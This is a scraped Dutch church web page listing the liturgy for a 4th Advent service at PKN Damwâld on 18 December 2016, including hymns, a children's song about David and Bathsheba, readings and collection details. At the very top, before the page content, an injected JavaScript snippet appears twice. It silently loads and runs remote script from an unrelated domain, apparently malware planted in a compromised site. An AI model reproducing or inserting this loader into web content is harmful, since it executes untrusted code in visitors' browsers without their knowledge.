;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 december 2016 9:30 uur - PKN Damwâld
zondag 18 december 2016
09:30 uur
4e Advent / KingKids kerstproject

Kerkdienst zondag 18 december 2016 9:30 uur

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Foeke Wiegersma
Mededeling:4e Advent / KingKids kerstproject
Liturgie
Lied voor de dienst Gezang 118: 1 en 2
Welkom en mededelingen
Intochtslied ELB 170: 1 en 2 + refrein
Stilgebed, bemoediging en groet .
Aansteken van de eerste Adventskaars
Het feest van Jezus
komt er aan,
‘k zie al vier kaarsjes
brandend staan.
Lied van Advent Gezang 126: 1, 2 en 3
Gebed .
Project Kingkids
- Vertelling van het verhaal van Bathseba
- Projectlied : BELOFTE VAN VERGEVING
Hoe groot was eens Davids zonde geweest
toen hij van Uria Bathseba nam
en Nathan zei: luister, jij bent die man.
David schaamde zich het meest.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.

Maar God gaf vergeving op zijn berouw,
zo toonde Hij ook aan David Zijn trouw.
Een nieuwe naam was er toen voor hun kind:
“jij bent door de HEER bemind”.

De Messias komt, want beloofd is beloofd,
de Messias komt, want beloofd is beloofd.
Vertrouw steeds op Hem, wees blij en geloof:
God zal doen wat Hij heeft beloofd.

- Kinderen gaan naar het Skûlplak
We lezen: 2 Samuel 11: 26 t/m 12: 14
We zingen: Psalm 51: 1 en 2
Verkondiging: Vertrouwen terugwinnen
We zingen: Psalm 51: 4, 5 en 6
Dankgebed en voorbeden .
Collecte
Slotlied ELB 184: 1, 2, 3 en 4 + refrein
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: Stichting Schuilplaats

Stichting Schuilplaats is een landelijke, Interkerkelijke hulpverleningsorganisatie. Stichting Schuilplaats begeleidt mensen die vastgelopen zijn en wil hen weer op weg helpen om nieuw perspectief te zien. De overtuiging dat de Heere God betrokken is op alle mensen vormt hun belangrijkste drijfveer om zich in te zetten voor de mensen die hulp bij hen vragen. De hulpverleners van de Stichting Schuilplaats zetten hun vakkennis en deskundigheden in om de cliënten te begeleiden in hun psychosociale problemen. Stichting Schuilplaats biedt Christelijke psychosociale hulpverlening in samenwerking met lokale kerken. Daarvoor zijn in de regio hulpverleningslocaties opgericht die de naam "Diaconaal Maatschappelijk Werk" voeren.

Tweede collecte: Kerk
Uitganscollecte: Kerk